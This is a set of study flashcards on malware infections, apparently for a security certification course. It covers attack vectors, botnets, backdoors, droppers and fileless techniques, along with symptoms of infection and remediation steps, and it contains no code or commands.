Section 3: Malware Infections Flashcards
Threat Vector
Method used by an attacker to access a victim’s machine
Attack Vector
Method used by an attacker to gain access to a victim’s machine in order to infect it with malware (the way we get to the machine and how we infect it)
What are the three most common delivery methods for malware infections?
Software, messaging, and media (usbs, etc.)
What is a watering hole?
Malware is placed on a website that you know your potential victims will access
Botnet
A collection of compromised computers under the control of a master node
What is a zombie in a botnet?
It is one of several computers being controlled by an attacker on one computer, called a C2, or Command and Control computer. These attackers utilize the zombie computers to conduct their attacks so it looks like it’s coming from your computer, not theirs. Processor intensive functions.
What is a DDoS?
Distributed Denial of Service attack. Attacker takes control of several machines, and they all make the request simultaneously to take a server down, or they use them to mine bitcoin.
Active Interception
Occurs when a computer is placed between the sender and receiver and is able to capture modify the traffic between them.
Privilege Escalation
Occurs when you are able to exploit a design flaw or bug in a system to gain access to resources that a normal user isn’t able to access (think about the demo with EternalBlue)
Backdoors
Used to bypass normal security and authentication functions
What is a Remote Access Trojan?
It is malware placed by an attacker maintain persistent access.
Easter Egg
Non-malicious code that when invoked, displays an insider joke, hidden message, or secret feature
Logic Bomb
Malicious code that has been inserted inside a program and will execute only when certain conditions have been met (adjacent to easter eggs) (this is the attack used in Jurassic Park)
Symptoms of infection
Computer is acting strangely, blue screening or locking up, restarts a lot, can’t get to files or apps anymore, strange noises, unusual error messages, display looks strange, jumbled printouts, new icons on the desktop, disappearing icons, double file extensions, AV won’t run, new files or folders, system restore doesn’t work
Removing Malware Common Practices
Identify symptoms of infection
Quarantine the infected systems so it won’t spread *unplug the network cable
Disable system restore (if you’re using Windows) so no one can take snapshots
Remediate the infected system (scan with AV and remove virus, rebooting in safe mode)
Schedule automatic updates and scans
Enable system restore and create a new restore point
Provide end user security awareness training
How can you remediate a boot sector virus?
Reboot the computer from an external device and scan it
Remove the drive, plug it into an external machine and scan it from there
What are ways you can prevent viruses?
A good antivirus solution, update your system, a good host-based firewall, going to secure websites
Best way to remediate a rootkit?
Reimage the machine
What is the best way to remediate spam?
Verify your email servers aren’t configured as open mail relays or SMTP open relays
Remove email addresses from website
Use whitelists and blacklists
Train and educate end users
What is an exploit technique?
Describes the specific method by which malware code infects a target host
Most modern malware uses _________ techniques to avoid detection by signature based security software
Fileless
Process that attackers commonly follow for exploitation
Get a dropper on their machine
Maintain access
Strengthen access
Actions on objectives (they have enough permissions that they can start doing what they want to do)
Concealment (start hiding themselves and start covering their tracks by doing things like deleting their log files)
Dropper
Malware designed to install or run other types of malware embedded in a payload on an infected host
Shellcode
Any lightweight code designed to run an exploit on a target (REMEMBER FOR THE TEST)
Code Injection
Exploit technique that runs malicious code with the identification number of a legitimate process
What is living off the land?
Exploit techniques that use standard system tools and packages to perform intrusions